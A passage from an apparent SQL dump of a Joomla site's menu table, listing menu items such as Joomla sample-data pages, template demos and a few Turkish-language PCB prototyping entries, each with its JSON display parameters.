00:00:00',0,1,'',115,'{\"maxLevel\":\"0\",\"show_category_title\":\"1\",\"page_subheading\":\"\",\"show_empty_categories\":\"\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"show_cat_num_articles\":\"\",\"display_num\":\"0\",\"show_headings\":\"0\",\"list_show_title\":\"0\",\"list_show_date\":\"0\",\"date_format\":\"\",\"list_show_hits\":\"0\",\"list_show_author\":\"0\",\"filter_field\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"order\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_limit\":\"0\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',204,217,0,'*',0),(415,'aboutjoomla','Navigation Modules','navigation-modules','','using-joomla/extensions/modules/navigation-modules','index.php?option=com_content&view=category&id=75','component',1,281,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"\",\"show_category_title\":\"\",\"page_subheading\":\"\",\"show_empty_categories\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"display_num\":\"\",\"show_headings\":\"\",\"list_show_title\":\"\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"\",\"list_show_author\":\"\",\"filter_field\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_limit\":\"\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',160,165,0,'*',0),(416,'aboutjoomla','Breadcrumbs','breadcrumbs','','using-joomla/extensions/modules/navigation-modules/breadcrumbs','index.php?option=com_content&view=article&id=61','component',1,415,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',163,164,0,'*',0),(417,'aboutjoomla','Weblinks','weblinks','','using-joomla/extensions/modules/display-modules/weblinks','index.php?option=com_content&view=article&id=55','component',1,413,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',199,200,0,'*',0),(418,'aboutjoomla','Custom HTML','custom-html','','using-joomla/extensions/modules/display-modules/custom-html','index.php?option=com_content&view=article&id=12','component',1,413,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',201,202,0,'*',0),(419,'aboutjoomla','Beez 2','beez-2','','using-joomla/extensions/templates/beez-2','index.php?option=com_content&view=category&layout=blog&id=69','component',1,282,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_description\":\"1\",\"show_description_image\":\"\",\"show_category_title\":\"\",\"show_cat_num_articles\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',220,225,0,'*',0),(422,'aboutjoomla','Atomic','atomic','','using-joomla/extensions/templates/atomic','index.php?option=com_content&view=category&layout=blog&id=68','component',1,282,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_description\":\"1\",\"show_description_image\":\"\",\"show_category_title\":\"\",\"show_cat_num_articles\":\"\",\"num_leading_articles\":\"2\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',232,237,0,'*',0),(423,'aboutjoomla','Typography Beez 2','typography-beez-2','','using-joomla/extensions/templates/beez-2/typography-beez-2','index.php?option=com_content&view=article&id=49','component',1,419,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',221,222,0,'*',0),(424,'aboutjoomla','Home Page Beez 2','home-page-beez-2','','using-joomla/extensions/templates/beez-2/home-page-beez-2','index.php?option=com_content&view=featured','component',1,419,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"3\",\"num_columns\":\"3\",\"num_links\":\"0\",\"multi_column_order\":\"1\",\"orderby_pri\":\"\",\"orderby_sec\":\"front\",\"order_date\":\"\",\"show_pagination\":\"2\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"1\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',223,224,0,'*',0),(670,'main','COM_JLSITEMAP','com_jlsitemap','','com_jlsitemap','index.php?option=com_jlsitemap','component',1,1,1,10138,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',345,346,0,'',1),(639,'solmenu-video-cnc','PCB Prototip/Prototyping','pcb-prototip-prototyping','','pcb-prototip-prototyping','index.php?option=com_content&view=article&id=94','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',317,328,0,'*',0),(640,'topmenu-tr','PCB Seviyeleme','pcb-seviyeleme','','video/pcb-seviyeleme','index.php?option=com_content&view=article&id=93','component',0,638,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',6,7,0,'*',0),(436,'aboutjoomla','Getting Help','getting-help','','using-joomla/getting-help','index.php?option=com_content&view=article&id=21','component',1,280,2,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"0\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',260,261,0,'*',0),(437,'aboutjoomla','Getting Started','getting-started','','getting-started','index.php?option=com_content&view=article&id=22','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',81,82,0,'*',0),(438,'mainmenu-degil','Weblinks','weblinks','','site-map/weblinks','index.php?option=com_weblinks&view=categories&id=0','component',0,294,2,21,0,'0000-00-00 00:00:00',0,1,'',115,'{\"categories_description\":\"\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"display_num\":\"\",\"show_headings\":\"\",\"orderby_pri\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"article-allow_ratings\":\"\",\"article-allow_comments\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',36,37,0,'*',0),(439,'mainmenu-degil','Contacts','contacts','','site-map/contacts','index.php?option=com_contact&view=categories&id=0','component',0,294,2,8,0,'0000-00-00 00:00:00',0,1,'',115,'{\"categories_description\":\"\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"display_num\":\"\",\"show_headings\":\"\",\"filter_field\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"1\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"article-allow_ratings\":\"\",\"article-allow_comments\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',38,39,0,'*',0),(443,'aboutjoomla','Article Categories','article-categories-view','','using-joomla/extensions/modules/content-modules/article-categories-view','index.php?option=com_content&view=article&id=3','component',1,411,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',177,178,0,'*',0),(444,'top','Sample Sites','sample-sites-2','','sample-sites-2','index.php?Itemid=','alias',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',115,'{\"aliasoptions\":\"238\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\"}',269,270,0,'*',0),(445,'mainmenu-degil','Parks','parks','','sample-sites/parks','index.php?Itemid=','alias',0,238,2,0,0,'0000-00-00 00:00:00',0,1,'',115,'{\"aliasoptions\":\"243\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\"}',276,277,0,'*',0),(446,'mainmenu-degil','Shop','shop','','sample-sites/shop','index.php?Itemid=','alias',0,238,2,0,0,'0000-00-00 00:00:00',0,1,'',115,'{\"aliasoptions\":\"429\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\"}',278,279,0,'*',0),(447,'aboutjoomla','Language Switcher','language-switcher','','using-joomla/extensions/modules/utility-modules/language-switcher','index.php?option=com_content&view=article&id=26','component',1,414,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',211,212,0,'*',0),(448,'mainmenu-degil','Site Administrator','site-administrator','','site-administrator','administrator','url',0,1,1,0,0,'0000-00-00 00:00:00',1,1,'',115,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\"}',281,282,0,'*',0),(449,'usermenu','Submit an Article','submit-an-article','','submit-an-article','index.php?option=com_content&view=form&layout=edit','component',1,1,1,22,0,'0000-00-00 00:00:00',0,3,'',115,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',283,284,0,'*',0),(450,'usermenu','Submit a Web Link','submit-a-web-link','','submit-a-web-link','index.php?option=com_weblinks&view=form&layout=edit','component',1,1,1,21,0,'0000-00-00 00:00:00',0,3,'',115,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',285,286,0,'*',0),(452,'aboutjoomla','Featured Contacts','featured-contacts','','using-joomla/extensions/components/contact-component/featured-contacts','index.php?option=com_contact&view=featured&id=16','component',1,270,5,8,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"-1\",\"show_empty_categories\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"display_num\":\"\",\"show_headings\":\"\",\"filter_field\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"presentation_style\":\"sliders\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"1\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":1,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',117,118,0,'*',0),(453,'aboutjoomla','Parameters','parameters','','using-joomla/parameters','index.php?option=com_content&view=article&id=32','component',1,280,2,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"1\",\"show_title\":\"1\",\"link_titles\":\"1\",\"show_intro\":\"1\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_parent_category\":\"1\",\"link_parent_category\":\"1\",\"show_author\":\"1\",\"link_author\":\"1\",\"show_create_date\":\"1\",\"show_modify_date\":\"1\",\"show_publish_date\":\"1\",\"show_item_navigation\":\"1\",\"show_icons\":\"1\",\"show_print_icon\":\"1\",\"show_email_icon\":\"1\",\"show_hits\":\"1\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',258,259,0,'*',0),(455,'mainmenu-degil','Example Pages','example-pages','','example-pages','index.php?Itemid=','alias',0,1,1,0,0,'0000-00-00 00:00:00',0,1,'',115,'{\"aliasoptions\":\"268\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\"}',287,288,0,'*',0),(456,'aboutjoomla','Beez5','beez5','','using-joomla/extensions/templates/beez5','index.php?option=com_content&view=category&layout=blog&id=70','component',1,282,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_description\":\"1\",\"show_description_image\":\"\",\"show_category_title\":\"\",\"show_cat_num_articles\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":1,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',226,231,0,'*',0),(457,'aboutjoomla','Typography Beez5','typography-beez-5','','using-joomla/extensions/templates/beez5/typography-beez-5','index.php?option=com_content&view=article&id=49','component',1,456,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":1,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',227,228,0,'*',0),(458,'aboutjoomla','Home Page Beez5','home-page-beez5','','using-joomla/extensions/templates/beez5/home-page-beez5','index.php?option=com_content&view=featured','component',1,456,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"3\",\"num_columns\":\"3\",\"num_links\":\"0\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"front\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":1,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',229,230,0,'*',0),(459,'aboutjoomla','Article Category','article-category','','using-joomla/extensions/modules/content-modules/article-category','index.php?option=com_content&view=article&id=4','component',1,411,5,22,0,'0000-00-00 